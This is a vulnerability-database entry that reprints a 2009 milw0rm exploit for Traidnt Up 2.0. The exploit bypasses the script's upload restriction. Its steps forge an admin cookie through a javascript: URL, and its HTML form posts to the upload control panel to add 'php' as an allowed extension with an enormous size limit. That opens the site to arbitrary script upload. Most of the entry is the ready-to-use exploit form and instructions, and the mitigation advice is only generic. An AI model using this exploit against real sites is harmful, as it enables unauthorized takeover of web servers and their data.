Traidnt Up version 2.0 Add Extension By Pass

vendor:

Traidnt Up

by:

SP4rT

7.5

CVSS

HIGH

Bypass

CWE

Product Name: Traidnt Up

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Traidnt Up version 2.0 Add Extension By Pass

A vulnerability in Traidnt Up version 2.0 allows an attacker to bypass the file upload restriction and upload arbitrary files. This is done by entering the uploadcp url, setting the documentcookie to 'trupuser=SP4rT;' and entering the page after editing the script_path and posting the extension.

Mitigation:

Ensure that the application is not vulnerable to bypassing the file upload restriction.

Source

Exploit-DB raw data:

<html>
<center>
<br>
<br>
<!--
#########################################################
#
#	Traidnt Up version 2.0 Add Extension By Pass
#	Author: SP4rT
#	Email : SP4rt@Yahoo.coM
#	DownLoad : http://traidnt.net/vb/showthread.php?t=943260
#	Downloads : 33712
#
#	1.	Enter uploadcp url 
#	2.	javascript:documentcookie="trupuser=SP4rT;";
#	3.	Enter this Page After Edit {script_path} & PosT your Extension .
#
#########################################################
-->
<form name='traidnt-ext' action='http:/{script_path}/uploadcp/files.php?do=extension&go=add' method='POST'>
<table border='1' width='450'>
<tr>
<td align='center' colspan='2'>Add Extension :</td>
</tr>
<tr>
<td align=center><input type='text' name='exname' value='php'>
<input type='hidden' name='maxsize' value='1000000000000'>
<input type='submit' value='   Add Ext   '>

</td>
</tr>
</table>

# milw0rm.com [2009-03-11]